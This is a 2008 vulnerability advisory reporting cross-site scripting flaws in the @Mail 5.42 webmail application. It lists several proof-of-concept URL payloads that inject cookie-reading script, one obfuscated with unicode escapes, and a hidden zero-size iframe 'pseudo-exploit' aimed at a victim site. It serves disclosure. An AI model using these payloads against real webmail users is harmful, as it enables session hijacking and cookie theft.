@mail version 5.42 suffers from multiple cross site scripting vulnerabilities.
a2eb6fa2375a9a5e0ec1b2d3c083525cd6b948e4b266a0d8a48fc42c2ffdd4b7
#=======================================================================#
.____ _________ ._.
| | ______ _ __/ _____/ ____ ____| |
| | / _ \ \/ \/ /\_____ \_/ __ \_/ ___\ |
| |__( <_> ) / / \ ___/\ \___\|
|_______ \____/ \/\_/ /_______ /\___ >\___ >_
\/ \/ \/ \/\/
(http://wwwlowsec.org)
#========================================================================#
#========================================================================#
Author: C1c4Tr1Z
Date: 30/08/08
Application: @Mail 5.42 (28/11/2007)
Product WebSite: http://atmail.com/
Issues:
[-]Cross-Site Scripting
#========================================================================#
#=============================[XSS]======================================#
This application suffers from numerous Cross-Site Scripting.With some
JavaScript knowledge, we are able to execute JS codes to stealcookies to
use the sessions, or anothers changes/actions.
POC:
/parse.php?file="><img/src/onerror=alert(document.cookie)>
/parse.php?file=html/english/help/filexp.html&FirstLoad=1&HelpFile=';}onload=function(){alert(0);foo='
/showmail.php?Folder=Spam';document.location='\u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003A\u0077\u0069\u0074\u0068\u0028\u0064\u006F\u0063\u0075\u006D\u0065\u006E\u0074\u0029\u0061\u006C\u0065\u0072\u0074\u0028\u0063\u006F\u006F\u006B\u0069\u0065\u0029';foo='
/abook.php?func=view&abookview=global"><img/src/onerror="alert(document.cookie)&email=138195
/showmail.php?Folder=Inbox&sort=EmailSubject&order=desc&start="><iframe/src="javascript:alert(document.cookie)
Pseudo-Exploit:
<iframe src="http://www.victim.com/parse.php?file=%22%3E%3Cimg/src/onerror=alert(document.cookie)%3E" frameBorder="0" style="height:0px;width:0px;">
#========================================================================#
#========================================================================#
Contact: C1c4Tr1Z <c1c4tr1z@lowsec.org>
(http://wwwlowsec.org)
LowSec! Web Application Security (Lab).
Deus ex Machina
#========================================================================#